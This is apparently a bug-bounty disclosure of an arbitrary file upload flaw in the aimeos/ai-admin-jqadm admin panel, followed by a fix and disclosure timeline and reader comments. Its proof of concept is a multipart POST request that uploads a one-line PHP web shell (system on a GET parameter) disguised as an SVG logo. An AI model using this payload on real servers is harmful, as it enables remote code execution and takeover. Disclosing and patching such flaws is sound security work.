Arbitrary file upload in aimeos/ai-admin-jqadm


Reported on

Aug 14th 2023


Due to lack of file extension validation, privileged user (administrator) can upload arbitrary files with "update logo" and "update icon" features. The application uses the extension provided in the filename parameter.

Proof of Concept

POST /admin/default/jqadm/save/settings?locale=en HTTP/1.1
Content-Disposition: form-data; name="media[logo]"; filename="test.php"
Content-Type: image/svg+xml

  /* <![CDATA[ */
    <?php system($_GET['c']);
 /* ]]> */

A request crafted this way will lead to "logo.php" file being created.


This leads to Remote Code Execution in versions using vulnerable "enshrined/svg-sanitize" library for sanitization (deployments that didn't upgrade since 2022.10.13). In newer versions there isn't any significant impact. But the arbitrary file upload part is still there in versions prior to 2023.07.3 that could be used as part of more complex exploit chain if additional vulnerabilities are discovered.

We are processing your report and will contact the aimeos/ai-admin-jqadm team within 24 hours. a month ago
We have contacted a member of the aimeos/ai-admin-jqadm team and are waiting to hear back a month ago
Aimeos validated this vulnerability a month ago
Stan has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Aimeos marked this as fixed in 2022.10.13 with commit bfd722 a month ago
Aimeos has been awarded the fix bounty
This vulnerability will not receive a CVE
Aimeos published this vulnerability a month ago
Standard.php#L317 has been validated
Standard.php#L359 has been validated
a month ago

how to build

a month ago


Any chance of registering a CVE for this? We've discussed it in the original report, but maybe you've changed your mind

to join this conversation